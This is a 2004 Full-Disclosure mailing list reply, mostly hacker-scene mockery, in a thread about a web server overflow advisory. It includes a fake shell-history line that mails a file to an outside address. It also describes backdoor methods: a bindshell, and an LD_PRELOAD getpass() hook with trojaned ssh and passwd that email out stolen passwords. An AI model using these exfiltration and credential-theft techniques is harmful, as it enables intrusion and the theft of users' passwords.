Re: [Full-Disclosure] H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security)

From: Slotto Corleone (slotto_at_gmail.com)
Date: 04/30/04

  • Next message: bugzilla_at_redhat.com: "[RHSA-2004:173-00] Updated mc packages resolve several vulnerabilities" 
    To: Richard Johnson <thief@bugtraq.org>
Date: Fri, 30 Apr 2004 11:30:20 -0800

    -- .bash_history from the drunken.fi.st box
    cd GOBBLES_dvdman
    uuencode haxorpc.jpg yo | mail research@bugtraq.org 

    --
Please return dvdman's copyright material before continuing any
further communication. Thank you.
On Fri, 30 Apr 2004 00:32:37 -0400, Richard Johnson <thief@bugtraq.org> wrote:
> 
> On Thu, Apr 29, 2004 at 03:56:50PM -0700, Slotto Corleone wrote:
> > - rave gets his account backdoored on kokanin's box. He finds the
> > obviously placed bindshell stashed as ~/bin/zsh. He laughs and says
> > the backdoor was lame. Well he obviously missed the getpass()
> > LD_PRELOAD, ssh, and passwd all on his local account mailing all his
> > new passwords out. Oh, and he left an exploit (servu.c) in his
> > directory for the version of servu ftpd he was running on his home
> > windows machine. Oops.
> 
> Care to share any additional information on how this described FreeBSD
> kernel bug can be exploited?
> 
> We are ready to pay top dollar for this information, to whoever comes
> forward with it.
> 
> --
> Richard Johnson, CISSP
> Senior Security Researcher
> iDEFENSE Inc.
> thief@bugtraq.org
> 
> Get paid for security stuff!!!!!!
> http://www.idefense.com/contributor.html
> 
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
  • Next message: bugzilla_at_redhat.com: "[RHSA-2004:173-00] Updated mc packages resolve several vulnerabilities"